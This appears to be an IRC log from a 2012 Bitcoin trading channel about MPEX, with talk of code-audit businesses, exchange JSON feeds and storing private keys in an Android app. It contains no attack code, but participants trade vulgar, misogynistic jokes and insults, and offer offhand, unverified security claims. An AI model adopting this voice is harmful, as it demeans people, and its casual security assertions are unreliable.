20:01:46 [MPEX] [S.MPOE] 12829 @ 0.0005998 = 7.6948 BTC [+] Dec 18 20:03:33 It sound like someone who knew pirate was going to default, manipulated the options market... Dec 18 20:05:12 tis possible. Dec 18 20:06:47 http://www.nanaimogold.com/ win Dec 18 20:11:22 I've been reading your code review business idea article again Dec 18 20:12:03 I didn't realize it was specifically targeted to BTC based code projects. Dec 18 20:12:46 yea Dec 18 20:14:03 It sounds like something that MTGox really needed... Dec 18 20:14:04 heh Dec 18 20:14:32 yeah Dec 18 20:15:48 I guess it makes sense. For example the issue they found in Ukto's code on bitfunder Dec 18 20:15:52 with the bid issue Dec 18 20:16:44 there's numerous examples. Dec 18 20:16:50 the insurance side is where the real profitability comes in Dec 18 20:16:56 it'd have saved the bitdaytrade investors 4k btc if they insisted on an audit Dec 18 20:17:00 and had where to have the code audited Dec 18 20:17:12 but how does one compete with say Norton? Dec 18 20:17:23 or other security firms who do this for contracts worth millions Dec 18 20:17:32 the whole "it's cheaper in BTC" Dec 18 20:17:32 nobody at norton has a clue abouyt bitcoin Dec 18 20:17:37 bitdaytrade would have never go out live if it would be a subject of code review Dec 18 20:18:23 exactly. Dec 18 20:18:54 but it's all about reputation Dec 18 20:19:02 if someone creates and exchange Dec 18 20:19:22 gets audited by this company, its the willingness to ensure your audit? Dec 18 20:19:26 that gives you credibility? Dec 18 20:20:02 because my biggest fear is what if you don't catch that small bug Dec 18 20:20:04 well, you get the audit and possibly insurance. Dec 18 20:20:14 someone injects some assembly and finds a huge bug Dec 18 20:20:25 millions of dollars lost Dec 18 20:20:42 sure. Dec 18 20:20:43 you'd have to have thorough penetration testing before the audit is "approved" Dec 18 20:20:53 insurance is insurance. Dec 18 20:20:56 possibly even continuation ethical hacking Dec 18 20:21:05 the point of insurance is to mitigate disasters not to avoid them. Dec 18 20:21:09 insurance companies don't make money by paying claims... Dec 18 20:21:36 they mitigate risks to the point the exposure is minimal Dec 18 20:21:40 anyone knows who owns walletbit.com ? Dec 18 20:21:41 its not about making it unhackable, is about making it hard enough to do Dec 18 20:21:48 mircea_popescu: kreal Dec 18 20:21:53 aha Dec 18 20:21:55 ty Dec 18 20:23:10 walletbit may overtake bitpay Dec 18 20:24:26 kakobreklaa: onions huh? Dec 18 20:24:34 hm? Dec 18 20:24:46 your security needs to be like an onion Dec 18 20:24:56 http://xkcd.com/538/ Dec 18 20:25:53 Isn't that what Russians do? Dec 18 20:26:02 im close. Dec 18 20:26:04 kidnap people and beat them over the head with turnips Dec 18 20:26:13 until they give up passwords Dec 18 20:27:14 ;;ticker Dec 18 20:27:15 BTCUSD ticker | Best bid: 13.22870, Best ask: 13.34999, Bid-ask spread: 0.12129, Last trade: 13.21656, 24 hour volume: 28522.62314613, 24 hour low: 13.10250, 24 hour high: 13.39900, 24 hour vwap: 13.26900 Dec 18 20:27:22 carrots > turnips Dec 18 20:27:46 mircea_popescu: I'm going to make a ticker app for MPEX when I go on vacation Dec 18 20:27:58 haha cool Dec 18 20:28:08 Enough information is public that you can just poll it Dec 18 20:28:20 he does have an api... Dec 18 20:28:21 I'm still mad that you use PHP but I"ll get over it Dec 18 20:28:30 I like hacks :P Dec 18 20:28:37 don't use the api, scraping ftw Dec 18 20:28:39 its not a hack its stupidtiy Dec 18 20:28:44 if you gonna parse html Dec 18 20:28:47 when api is there Dec 18 20:28:48 o/ put it there pigeons Dec 18 20:29:11 Back in my day we didn't have API's for everything Dec 18 20:29:17 we had to actually parse strings and shit Dec 18 20:29:35 aha Dec 18 20:29:40 first you pulled the string Dec 18 20:29:44 the you parsed it Dec 18 20:29:53 you sting parser you. Dec 18 20:30:05 then* Dec 18 20:30:12 ah well Dec 18 20:30:16 off to the store. Dec 18 20:30:22 well let's break the news to thestringpuller Dec 18 20:30:36 is it bad news doc? Dec 18 20:30:41 I got cancer don't I? Dec 18 20:30:58 mpex.co/mpex-vwap.php Dec 18 20:31:21 if you are going to parse html do it with regex so its at least completley wrong Dec 18 20:31:34 XD Dec 18 20:31:39 kakobreklaa why not replacestr or w/e it's called Dec 18 20:31:39 that's what I was planning to do Dec 18 20:31:43 sorta halfway regex Dec 18 20:31:50 stupid mans regex Dec 18 20:31:55 or you could just use awk or sed Dec 18 20:32:15 scrape all content with sed Dec 18 20:32:15 sedawk all the girls. Dec 18 20:32:18 or awk Dec 18 20:33:00 one time i wrote some wget scripts to scrape the funny images from 8 differnet funny image sites Dec 18 20:33:12 the next morning i hat 400,000 funny jpgs Dec 18 20:33:27 and it wasnt funny. Dec 18 20:33:34 no, no it wasn't Dec 18 20:34:27 XD Dec 18 20:34:43 one time i made some wget scripts to fuck with technorati. the next morning i had the #1 spot. Dec 18 20:35:18 way way wack Dec 18 20:35:27 <[\\\\\\\\\\\\\\]> one time, I made some shit up in an irc channel and bragged about it Dec 18 20:35:42 is that you imsaguy? Dec 18 20:35:43 you make me cry Dec 18 20:36:00 mircea_popescu: is mpex-vwap.php the only stat json that's publicly availabe Dec 18 20:36:02 EskimoBob https://en.bitcoin.it/wiki/Trade " Art and Artwork (none) " Dec 18 20:36:04 what else yougot? Dec 18 20:36:22 go with the html apis are so new age pft! Dec 18 20:36:23 thestringpuller there's mkt depth too Dec 18 20:36:24 [\\\\\\\\\\\\\\]: and the this one time, and band camp... Dec 18 20:36:36 <[\\\\\\\\\\\\\\]> Ukto, I don't wanna know about your flute Dec 18 20:36:37 i can't believe slashy still lives. Dec 18 20:36:38 it was a tuba, not a flute Dec 18 20:36:44 LOL Dec 18 20:36:45 What happened to going to the store Ukto ? Dec 18 20:36:51 jchysk: thats movie 1 vs 2 Dec 18 20:36:54 I want my FF7 Dec 18 20:36:57 whut store? Dec 18 20:37:01 school ? Dec 18 20:37:01 <[\\\\\\\\\\\\\\]> mircea_popescu, why would it not? Dec 18 20:37:02 I'll pay 2000BTC Dec 18 20:37:03 get your facts straight Dec 18 20:37:04 :P Dec 18 20:37:14 (not really) Dec 18 20:37:15 dja have any idea when's the last time you said something ? Dec 18 20:37:36 <[\\\\\\\\\\\\\\]> no, been busy, stuff and stuff Dec 18 20:37:54 well good for you anyway. Dec 18 20:38:00 <[\\\\\\\\\\\\\\]> if you say so Dec 18 20:38:07 FireSteel.com FireSteels are used by tens of thousands of people including the US Military, hikers, hunters, scouts, survivalists, outdoors enthusiasts and bushcrafters the world over. Dec 18 20:38:07 Buy our FireSteels and you'll never worry about being able to start a fire. Dec 18 20:38:10 mircea_popescu: where is the depth table json Dec 18 20:38:14 who the fuck is worried about starting fires Dec 18 20:38:33 <[\\\\\\\\\\\\\\]> just keep a bic in the glove box Dec 18 20:38:38 thestringpuller mpex.co/mpex-mktdepth-jsonp.php Dec 18 20:38:40 people who do Bacon ala Quran Dec 18 20:38:46 mircea_popescu: what about this link? Dec 18 20:38:47 <[\\\\\\\\\\\\\\]> if you're stranded long enough that you run out of lighter fluid, you're probably gonna die anyway Dec 18 20:39:05 <[\\\\\\\\\\\\\\]> and I mean that in the nicest way possible Dec 18 20:39:06 i can make fire by rubbing two girls together. Dec 18 20:39:14 provided one's blonde and the other's brunette. Dec 18 20:39:34 <[\\\\\\\\\\\\\\]> you have two different shares of hair on your palms? Dec 18 20:39:36 EskimoBob grep for "art" Dec 18 20:39:37 <[\\\\\\\\\\\\\\]> shades* Dec 18 20:39:57 blonde and brunette aren't motherfucking shades Dec 18 20:40:25 [MPEX] [S.MPOE] 11071 @ 0.0005998 = 6.6404 BTC [+] Dec 18 20:40:26 [MPEX] [S.MPOE] 7029 @ 0.00060014 = 4.2184 BTC [+] Dec 18 20:40:52 so? Dec 18 20:41:24 so add your negligible yet soon to dissapear attempt in there. Dec 18 20:42:03 wtf are you blabbering about now? Dec 18 20:42:40 no one believes in EskimoBobs dream of creating a BTC-based art studio? Dec 18 20:43:15 if bitcoins were backed by buckteeth fat girl butts... Dec 18 20:43:32 he suggests you let people who browse the bitcoin wiki know that they can get "art" for bitcoins Dec 18 20:43:48 "The Real Skin All-American Whopper measures 7 inches with an insertable length of 5.5 inches, 1.25-1.5 inches in width and a circumference of 4.5-5 inches, and is realistically sculpted for the size, feel, and pleasure of the real thing." Dec 18 20:43:55 5 inches ? real thing ? Dec 18 20:44:18 thestringpuller: mircea_popescu is lonely fuck who just stirs up shit. Do not take that delusional retard too seriously ;) Dec 18 20:45:10 L33t Consultant, IT Consulting on Anything Security, Networks & Servers. All OS - All Software. Dec 18 20:45:15 the wiki is a serious goldmine. Dec 18 20:46:08 "Discover…No B.S. Asset Protection The Ultimate, No Holds Barred, Kick Butt, Take No Prisoners Asset Protection & Privacy Package Plus Exclusive Lifetime Site Membership" Dec 18 20:50:37 mircea_popescu: where is the market depth json waaaaaah Dec 18 20:50:40 waaaaah Dec 18 20:52:19 thestringpuller mpex.co/mpex-mktdepth-json.php Dec 18 20:53:12 i have not started a fire with my firesteel yet Dec 18 20:53:20 vaguely tried Dec 18 20:54:06 usagi : "this is probably a scam" https://bitcointalk.org/index.php?topic=130947.msg1407545#msg1407545 Dec 18 20:54:11 he should know Dec 18 20:54:26 jcpham what is it, an electric arc sorta thing ? Dec 18 20:54:41 it's like a big flint Dec 18 20:54:49 you scrape it and make sparks Dec 18 20:54:57 like a survival fire starter Dec 18 20:56:12 a Dec 18 20:57:45 requires fibrous tender Dec 18 20:57:55 rubbiung sticks and blowing Dec 18 20:57:58 shrug Dec 18 20:59:26 mircea_popescu: there is a bug, it took me to trilemma Dec 18 21:00:18 Usagi can fucking rant on the forums but not get me my fucking BTC Dec 18 21:00:20 fuck dat guy Dec 18 21:00:34 i just tried it, tis fine. Dec 18 21:00:39 http://mpex.co/mpex-vwap.php Dec 18 21:00:43 ow tried the wrong one Dec 18 21:00:58 mpex.co/mpex-mktdepth-json.php Dec 18 21:01:04 keep redirecting to your blog Dec 18 21:01:29 [MPEX] [S.MPOE] 5050 @ 0.00060014 = 3.0307 BTC [+] Dec 18 21:01:35 mpex.co/mpex-mktdepth-jsonp.php Dec 18 21:02:00 or else Dec 18 21:02:04 mpex.co/mpex-mktdepth.php Dec 18 21:02:05 that worked Dec 18 21:02:10 thanks mircea_popescu Dec 18 21:07:12 ;;ticker Dec 18 21:07:13 BTCUSD ticker | Best bid: 13.30001, Best ask: 13.34998, Bid-ask spread: 0.04997, Last trade: 13.30002, 24 hour volume: 28406.18807176, 24 hour low: 13.10250, 24 hour high: 13.39900, 24 hour vwap: 13.27054 Dec 18 21:07:17 ;;tslb Dec 18 21:07:20 Time since last block: 8 minutes and 40 seconds Dec 18 21:07:26 ;;bc,diff Dec 18 21:07:27 3370181.7992778 Dec 18 21:08:30 btc volatility is going down Dec 18 21:08:36 overall Dec 18 21:10:31 [MPEX] [S.MPOE] 11171 @ 0.00060014 = 6.7042 BTC [+] Dec 18 21:10:32 [MPEX] [S.MPOE] 3829 @ 0.0006002 = 2.2982 BTC [+] Dec 18 21:12:59 august was a baaaaad month Dec 18 21:14:18 mircea_popescu: http://trilema.com/2012/mpoe-bonds-historical-data/ - the loss of august seems to dwarf everything... Dec 18 21:16:55 the bondholders in august...got creamed Dec 18 21:17:03 yeah. Dec 18 21:17:39 are there any new safeguards? Dec 18 21:17:50 nope. it can happen, one bad month can hurt. Dec 18 21:19:05 [MPEX] [S.MPOE] 3000 @ 0.0006002 = 1.8006 BTC [+] Dec 18 21:19:10 but that month was REALLY bad Dec 18 21:19:31 like people jumping out of skyscrapers bad Dec 18 21:20:58 yeah Dec 18 21:21:02 http://bitcoincharts.com/charts/chart.png?width=940&m=mtgoxUSD&SubmitButton=Draw&r=60&i=Hourly&c=1&s=2012-08-17&e=2012-08-21&Prev=&Next=&t=S&b=&a1=&m1=10&a2=&m2=25&x=0&i1=&i2=&i3=&i4=&v=1&cv=0&ps=0&l=0&p=0& Dec 18 21:22:34 ouch Dec 18 21:22:39 [MPEX] [S.MPOE] 4321 @ 0.00059918 = 2.5891 BTC [-] Dec 18 21:22:41 [MPEX] [S.MPOE] 12400 @ 0.00059883 = 7.4255 BTC [-] Dec 18 21:22:42 [MPEX] [S.MPOE] 11895 @ 0.00059238 = 7.0464 BTC [-] Dec 18 21:22:43 shoulda used a Lorentzian instead of a Gaussian price movement model... Dec 18 21:22:48 14 to 11 in 1 day Dec 18 21:23:10 Bugpowder shoulda not been in a market where self-aggrandizing idiots put 5% of the m3 into ponzis Dec 18 21:26:06 fuuuuccckkk usagi is back and off the fkn meds. Not that shit again ... LOL Dec 18 21:27:48 Does Black-Scholes have a ponzi correction term? Dec 18 21:28:05 if it ever does it will become BSM Dec 18 21:28:29 Black-Scholes-Maddof Dec 18 21:29:35 Hey EskimoBob Dec 18 21:29:50 No, haven't received your claim from GLBSE yet. Dec 18 21:31:46 the Lorentz transformation Dec 18 21:31:51 Namjies: hola Dec 18 21:31:56 the most brilliant thing ever Dec 18 21:32:24 not related Dec 18 21:32:25 Bugpowder: You were talking about a Lorentz right? Dec 18 21:32:27 oh Dec 18 21:32:29 :( Dec 18 21:32:42 well I'll just go to my corner and continue reading about relativity then Dec 18 21:32:50 Namjies: James told me he sent out (or promised to send) a updated list and assured me that my name is on the list Dec 18 21:32:52 http://en.wikipedia.org/wiki/Cauchy_distribution Dec 18 21:33:17 unless you are talking to someone else Namjies :) Dec 18 21:33:24 It's why 100-year black swan events happen every 8 years. Dec 18 21:34:35 100 year black swan events heh Dec 18 21:34:44 damn Bugpowder you people enlighten me everyda Dec 18 21:34:55 I've learned more in this IRC channel than I ever did in public school Dec 18 21:35:00 Down with welfare Dec 18 21:43:47 I was looking at some property in a 100-year flood plain the other day, supposedly expected to flood every 3-5 years Dec 18 21:50:27 lol Bitcoin magazine charges 100 bucks for a 12 issue subscription? Dec 18 21:50:47 (11:34) < thestringpuller> I've learned more in this IRC channel than I ever did in public school Dec 18 21:50:49 moron tax Dec 18 21:50:50 ^^^ :D Dec 18 21:50:51 are they still in business? Dec 18 21:51:31 mod6: can I help with the Mpex android app? Dec 18 21:51:44 Vlad ripped the magazine off and it sounded like that wast the end Dec 18 21:52:01 issue #5 just came out Dec 18 21:52:49 OK Dec 18 21:52:58 http://trilema.com/2012/the-bitcoin-drama-timeline/ - I was reading that Dec 18 21:53:18 thestringpuller: I do actually need help. And for sure in the future there will be tons more to do. Dec 18 21:53:55 What framework are you going to use? Dec 18 21:54:10 in terms of data access Dec 18 21:54:24 like how people use Spring Framework for Java EE Dec 18 21:54:35 ahhh. Dec 18 21:54:42 lol Bitcoin magazine charges 100 bucks for a 12 issue subscription? <<< yes, they will deliver the 12th issue in 2044 Dec 18 21:55:16 why don't you spin off trilemma into a magazine? Dec 18 21:55:33 well, i started a #BitOTTer channel for technical discussions.... but basically how this works is it doesn't persist anything at this time Dec 18 21:56:04 a magazine is one of those pointless things whores employed by rich men fill their time with. Dec 18 21:56:25 it connects to mpex (currently just over inet, tor ability is coming, probably in beta, tor works with perl version) and grabs all the JSON and parses it. Dec 18 21:56:46 i was talking more about the service to DAO Dec 18 21:56:53 even though there is no writing to a db Dec 18 21:56:59 you have to read from one albeit over an API Dec 18 21:57:26 like for instance I was reading in JSON from a server that had data on it Dec 18 21:57:38 so I used GSON wrapped with access objects Dec 18 21:58:20 ahh, yeah, nothing with GSON. i tried to get my head wrapped around how to use it with android and the funky mpex json, but I couldn't make it work Dec 18 21:58:28 i just muscled past it with my own solution Dec 18 21:58:32 Haha Dec 18 21:58:41 hit it with a hammer till it behaves solution huh? Dec 18 21:59:03 well, sort of.. i love to make it really nice and awesomesauce, but having it work is much better. Dec 18 21:59:10 [MPEX] [S.MPOE] 4321 @ 0.00060018 = 2.5934 BTC [+] Dec 18 21:59:11 [MPEX] [S.MPOE] 1929 @ 0.0006002 = 1.1578 BTC [+] Dec 18 21:59:31 So in the future, I really hope to get to revise a lot of stuff that I've already learned on the alpha project... but its sort of too late to turn around. Dec 18 21:59:59 well if you want I can be your jr. dev, just assign me tickets and I"ll send you patches Dec 18 22:00:06 I was talking about building BitOTTer as an android tool for mpex in march/april, but noone was really interested... until later, and then I really had to turn up the gas to try to catch up. Dec 18 22:00:58 If you're really serious, I do have quite a bunch to do. It sounds like you know what's up. Dec 18 22:01:12 I'm a Java EE developer and spent a few years doing Android Dev Dec 18 22:01:27 If you migrate to iOS I can't really do anything for you Dec 18 22:01:34 I can work out something in the form of small btc payments on a per-diem basis or something... Dec 18 22:01:43 nah I'd rather just code for the fun of it Dec 18 22:01:49 for a good cause Dec 18 22:02:12 wow. even more awesome. well, you won't be forgotten if you help with this project in some way. Dec 18 22:03:23 Anything I can do to get better at coding. Dec 18 22:03:34 Right now i have a nuts-o day job, thats more like an everyhour job. I am looking forward to making 2013 the year I can leave that behind :D Dec 18 22:03:43 Dude you have no idea Dec 18 22:03:48 I so feel you Dec 18 22:04:04 I do EE development for credit card processors Dec 18 22:04:17 it's like 90% meetings 10% copy paste code Dec 18 22:04:23 every hour every day... Dec 18 22:04:24 ugh Dec 18 22:04:27 thats great, this is all java, nothing too complicated really at all. Dec 18 22:05:17 just had some problems with spongycastle/bouncycastle trying to get the KeyStore to work the way I wanted. I got SOOOOO close, but it was eating up too much time. Dec 18 22:05:28 Android keystores are weird as shit Dec 18 22:05:50 in fact I don't think you can use traditional SSH keys on it Dec 18 22:06:17 ah, maybe not? Dec 18 22:07:00 hold on i spent weeks getting SSHd and SCP to run natively on my droid Dec 18 22:07:13 to be thwarted by a cp memory overrun Dec 18 22:07:58 there we go Dec 18 22:07:59 dropbear Dec 18 22:08:07 ahh hmm Dec 18 22:08:13 dropbear ssh Dec 18 22:08:23 they did a port that's now in the android git repo Dec 18 22:08:42 but you have to convert you DSA/RSA keys into dropbear format Dec 18 22:08:51 like stuff you'd generate from openssh Dec 18 22:09:05 lol, i just saw a picture of a kowala eating a guys face Dec 18 22:09:06 I assume pgp will be similar since the android keystore is a little weird Dec 18 22:09:26 yeah, i had to get down to the nuts and bolts Dec 18 22:10:00 i had to get the public key packet, secret key packet... extract the private key from the secrete key spec then create a x509 cert and construct that with the pub and priv keys. Dec 18 22:10:09 are you doing it remote? Dec 18 22:10:17 only bitch of it is... once I pull the cert out on the other side, i can't get out the private key. Dec 18 22:10:26 only the public key. the api is limited here. Dec 18 22:10:40 fucking keystore Dec 18 22:10:45 just can't store a private key... Dec 18 22:10:52 nope :/ Dec 18 22:10:54 we meet again my old friend Dec 18 22:10:56 for.. pgp? Dec 18 22:11:03 or gpg Dec 18 22:11:07 any key really Dec 18 22:11:13 yeah, i don't think it matters Dec 18 22:11:15 except androids "special format" Dec 18 22:11:18 you shouldn't be storing priv keys on a pgp (or gpg) keystore Dec 18 22:11:23 EskimoBob: what's your email/bitcoin address for GLBSE? PM me. I'll check again but my last list was received some time ago. Dec 18 22:11:23 that's not how it's meant to work Dec 18 22:11:36 yea but android is stripped down Dec 18 22:11:49 priv key remains private, public keys are on the keystore so you can look them up Dec 18 22:11:50 at that level I was working with PGPPublicKey, PGPSecretKey and PGPPrivateKey and converting them to their native java analogues Dec 18 22:12:02 iz: the keystore is local Dec 18 22:12:05 ohhh Dec 18 22:12:09 yeah, that sucks then Dec 18 22:12:12 iz: android doesn't have a normal filesystem Dec 18 22:12:18 yeah, i gotcha now Dec 18 22:12:25 iz: so for things that are "private" it stores them locally in a weird fucked up way Dec 18 22:12:37 iz: yeah, i know, but im trying to come up with a clever way to store the users private key incase the device is stolen or hacked, you don't want to lose thatkey. Dec 18 22:12:45 exactly! Dec 18 22:12:51 listening to you ppl talk im slowly realising apple is the new microsoft. Dec 18 22:12:52 encrypt it w/ a password Dec 18 22:12:52 if you lose your phone with the bitcoin wallet Dec 18 22:13:01 this is EXACTLY how discussions went cca 1995 Dec 18 22:13:03 people can take the private keys out Dec 18 22:13:20 apple is pretty nuts, i'll convert to iOS someday if there is enough interest... but that'll be its own can of worms. Dec 18 22:13:21 Namjies: pm sent Dec 18 22:13:27 well, if you loose your wallet, ppl can take your cash out too Dec 18 22:13:46 lose Dec 18 22:13:49 iOS is pretty good Dec 18 22:13:55 but it's not friendly Dec 18 22:14:04 well the low level to high level interface isn't friedly Dec 18 22:14:13 friendly* Dec 18 22:14:18 iz: so in the mean time, I have a AES256 class that I wrote that will utilize AES and enc/dec the key... at least that way, its protected by the symmetric key Dec 18 22:14:56 mod6: one thing you an do is encrypt local data for the app Dec 18 22:15:11 each app runs under it's on PID, and UID, so no other app can access it Dec 18 22:15:35 mod6: yeah, that seems good enough for now... does android have DRM crap that you can hijack for that? Dec 18 22:16:24 iz: not DRM persay, but if you root your phone you can do an encrypted FS Dec 18 22:16:27 iz: hm, I really wish! if they do, I'm missing it. I'm not super well versed in Android though, a lot of stuff is new to me here. Dec 18 22:16:53 but then you're limiting yourself to only "experienced" users Dec 18 22:17:04 and what worries me, is like I was saying to mircea_popescu the other night. all these cell providers leave backdoors through the os to turn shit on/off or to steal your data/coins. Dec 18 22:17:07 yeah, i took a quick look and it seems like the android DRM is about playback restriction and doesn't really have a pub/priv key that is used Dec 18 22:17:29 So... I'd like to put something in place thats non-native in a way I guess. Another layer to the onion so to speak. Dec 18 22:17:54 mod6: just encrypt the app local file store Dec 18 22:18:10 with the AES256 class you are writing Dec 18 22:18:27 thestringpuller: this maybe the way to go. i'll have to talk to you more about that. or do some searching there... need to see how that works out. Dec 18 22:18:33 oh. Dec 18 22:18:45 I see, you're just saying to enc all the files in the local dir? Dec 18 22:18:51 just for the mpex app Dec 18 22:18:56 each app has it's only local file store Dec 18 22:18:57 right. Dec 18 22:19:08 most people don't encrypt that shit but I don't see why you couldn't Dec 18 22:19:14 it adds another layer Dec 18 22:19:18 Well, I could do that for sure. Infact, it started out that way, and then I was like, "why am i encrypting this public key..." Dec 18 22:19:31 true Dec 18 22:19:51 its time related. Dec 18 22:19:54 but rogue apps take over phones everyday Dec 18 22:20:08 if they can get into another apps local fs somehow Dec 18 22:20:19 then it's like the plaintext password with Sony and MTGox Dec 18 22:20:31 and LinkedIn for that matter Dec 18 22:20:34 right. Dec 18 22:20:52 Good stuff man. Thanks to everyone for all your comments on this today. Dec 18 22:20:58 Very much helpful. Dec 18 22:20:59 also it's nearly impossible for a rogue app to read from memory Dec 18 22:21:16 because essentially the only time the private key would be "exposed" is when it's in memory decrypting data Dec 18 22:21:19 or in use* Dec 18 22:21:27 it wouldn't be "on disc" decrypted Dec 18 22:21:36 [MPEX] [S.MPOE] 8950 @ 0.0006002 = 5.3718 BTC [+] Dec 18 22:21:38 yup. true enough. Dec 18 22:22:04 but i feel you it is a pain not having a place to store the private key Dec 18 22:22:36 yeah, it makes it tough. i was worried about this before the project got off the ground, and it didn't disappoint. Dec 18 22:23:07 But... i'm pretty much past it, for now. I'm looking forward to getting it out here soon and then working on the beta. Dec 18 22:23:14 yea it's why bank apps don't store anything locally Dec 18 22:23:22 most bank apps are web based and connect to a webpage based ap Dec 18 22:23:24 app* Dec 18 22:23:50 its really kind of a shame Dec 18 22:24:35 mod6: i pmed you my github account Dec 18 22:24:35 yeah for sure. Dec 18 22:24:40 oh ok! Dec 18 22:25:05 i don't got much on there cause I just don't have anything to collaborate with I usually just keep everything local Dec 18 22:35:41 [MPEX] [S.MPOE] 18776 @ 0.0006002 = 11.2694 BTC [+] Dec 18 22:38:35 Thanks again for the help/comments guise. :) Dec 18 22:58:52 thestringpuller, next time just look into live.coinbr.com sauce Dec 18 22:59:23 it uses some secret mpex apis Dec 18 23:00:44 [MPEX] [S.MPOE] 10750 @ 0.0006002 = 6.4522 BTC [+] Dec 18 23:02:26 mother of christ Dec 18 23:02:47 more flash crashes this patch than ever before Dec 18 23:03:54 i need a nap Dec 18 23:13:29 [MPEX] [S.MPOE] 4321 @ 0.00059499 = 2.571 BTC [-] Dec 18 23:13:32 [MPEX] [S.MPOE] 18779 @ 0.00059474 = 11.1686 BTC [-] Dec 18 23:25:32 [MPEX] [S.MPOE] 4321 @ 0.00059991 = 2.5922 BTC [+] Dec 18 23:25:33 [MPEX] [S.MPOE] 6651 @ 0.0006002 = 3.9919 BTC [+] Dec 18 23:32:12 [MPEX] [S.MPOE] 9115 @ 0.0006002 = 5.4708 BTC [+] Dec 18 23:32:13 [MPEX] [S.MPOE] 9335 @ 0.00060397 = 5.6381 BTC [+] **** BEGIN LOGGING AT Wed Dec 19 08:21:16 2012 Dec 19 08:21:40 aaaaaaaaai'm a lumberjack and i'm okay... Dec 19 08:22:38 mod6: thx :) Dec 19 08:23:22 mircea_popescu: sometimes you act way too much like my first girlfriend Dec 19 08:23:38 lmao Dec 19 08:23:50 * you like monty python Dec 19 08:23:54 *you say 'prolly' Dec 19 08:24:11 i'm going to go have a smoke instead of continuing this list Dec 19 08:24:13 :P Dec 19 08:24:16 lmao Dec 19 08:24:54 i thought it was moar like, 1. you beat up on naked girls ; 2. you do magics with money ; 3. you're pretty fucking scary ; 4. you have the biggest beard i ever saw outside of like, a deceased patriarch Dec 19 08:25:12 which'd be pretty strange for a GIRLFRIEND Dec 19 08:35:50 anyone with a BF account happen to be awake? Dec 19 08:36:45 ya Dec 19 08:37:02 do you happen to have any orders placed atm? Dec 19 08:37:16 no Dec 19 08:37:18 k Dec 19 08:37:42 Just wanted to make sure ppl could see the 'my ask'/'my bid' and cancel button on the orders list Dec 19 08:38:27 pigeons: did you see the new depth graph? kinda crappy, but not bad for a first start Dec 19 08:38:37 gonna try to add that selector line like on the trading graph Dec 19 08:39:50 Ukto how's the bond pt going ? Dec 19 08:40:21 yeah cool Dec 19 08:40:30 [MPEX] [S.DICE] 1700 @ 0.0036 = 6.12 BTC [+] Dec 19 08:41:11 387 shares sold (0.1 value) Dec 19 08:41:27 so likely it will get to 100 huh Dec 19 08:41:28 wait Dec 19 08:41:47 287 shares sold Dec 19 08:41:53 about 28btc Dec 19 08:41:58 so it COULD make it Dec 19 08:42:04 if anything get pretty close Dec 19 08:42:05 a so about same as yest Dec 19 08:42:35 been aboud 140shares per day so far Dec 19 08:42:51 if it maintains, then yeah, should have enough Dec 19 08:43:00 but with finals Dec 19 08:43:02 and holidays Dec 19 08:43:06 ppl will be stepping away Dec 19 08:43:09 so it may not, hard to say Dec 19 08:43:36 the only real attention BF is getting, is the securities forum, and that reddit post jurov linked it in Dec 19 08:44:36 kind of a hard sell for btc veterans. i imagine it must be attractive to new ppl. Dec 19 08:45:07 well, the bonds have a reasonably good history Dec 19 08:45:34 though a 2~4% gain, with the risk of that nasty looking possible-pirate month scares alot of ppl it seems Dec 19 08:45:37 i meant more generally bf Dec 19 08:45:40 thats the only complanit I have seen Dec 19 08:45:47 ah yeah Dec 19 08:45:52 well Dec 19 08:45:59 sat least ppl like it Dec 19 08:46:00 otherwise the bonds do tend to collect about enough capital each time Dec 19 08:46:04 or choose it over other options Dec 19 08:46:11 the test with the sdice asset Dec 19 08:46:15 originally people were putting like 2-3k in, cause it's what it used, then it had that 8k month i covered for Dec 19 08:46:15 is showing to be almost 4:1 now Dec 19 08:46:19 so people put in like 8-10k Dec 19 08:46:32 recently it had that 40k month, i imagine it'll get filled close to that again Dec 19 08:46:51 yeah, too bad I didnt get any in for this month. ;) Dec 19 08:46:58 :p Dec 19 08:47:01 what's 4:1 ? Dec 19 08:47:11 the ppl who chose bf Dec 19 08:47:13 over .. others Dec 19 08:47:24 o hehe Dec 19 08:47:26 2 out of 3 dentists prefer glbse Dec 19 08:47:31 lol Dec 19 08:47:36 in shareholder counts. share counts, pffft, almost no comparison Dec 19 08:47:41 ahahah dude pigeons is like the aftershave of humour. Dec 19 08:47:56 yeah, i like em Dec 19 08:48:01 as stringent as aftershave anyway Dec 19 08:48:03 until he decides to go on a drive bomb run Dec 19 08:48:56 Ahh Dec 19 08:49:01 got the selector line now in teh depth graph Dec 19 08:49:23 and zooming Dec 19 08:51:43 lol funny how jurov's reddit got 8 yes 8 no votes Dec 19 08:54:03 what other graphing type info Dec 19 08:54:06 can I display... Dec 19 08:54:40 any use for a polar chart... mebbe a nifty pie? Dec 19 08:55:39 mmmm pie Dec 19 08:56:05 donut chart? Dec 19 08:56:06 :P Dec 19 08:56:36 ok so sr was haxxored Dec 19 08:57:06 I woudl do OHLC & Candles... but as I said before.. its a 24hr market... seems that open/close is pointless data Dec 19 08:57:14 someone seems to be usiong some sort of sql injection to replace item images Dec 19 09:10:01 [MPEX] [S.DICE] 3500 @ 0.00355763 = 12.4517 BTC [-] Dec 19 09:10:03 [MPEX] [S.DICE] 363 @ 0.0035 = 1.2705 BTC [-] Dec 19 09:17:37 [MPEX] [S.MPOE] 16000 @ 0.00063658 = 10.1853 BTC [+] Dec 19 09:27:41 [MPEX] [S.MPOE] 4321 @ 0.0006348 = 2.743 BTC [-] Dec 19 09:27:42 [MPEX] [S.MPOE] 5179 @ 0.00063453 = 3.2862 BTC [-] Dec 19 09:42:47 [MPEX] [S.MPOE] 4321 @ 0.00063623 = 2.7491 BTC [+] Dec 19 09:42:48 [MPEX] [S.MPOE] 200 @ 0.00063658 = 0.1273 BTC [+] Dec 19 09:42:49 [MPEX] [S.MPOE] 37477 @ 0.00063666 = 23.8601 BTC [+] Dec 19 10:14:57 dinally posted a forum avatar... >:P~ https://bitcointalk.org/index.php?topic=130117.0 Dec 19 10:15:15 *finally Dec 19 10:32:54 [MPEX] [S.MPOE] 4321 @ 0.00063467 = 2.7424 BTC [-] Dec 19 10:32:56 [MPEX] [S.MPOE] 20879 @ 0.00063453 = 13.2484 BTC [-] Dec 19 10:57:24 [MPEX] [S.MPOE] 4321 @ 0.00063477 = 2.7428 BTC [+] Dec 19 10:57:24 [MPEX] [S.MPOE] 172 @ 0.00063453 = 0.1091 BTC [-] Dec 19 10:57:26 [MPEX] [S.MPOE] 8076 @ 0.000629 = 5.0798 BTC [-] Dec 19 11:02:04 [MPEX] [S.MPOE] 1048 @ 0.00062922 = 0.6594 BTC [+] Dec 19 11:16:52 The 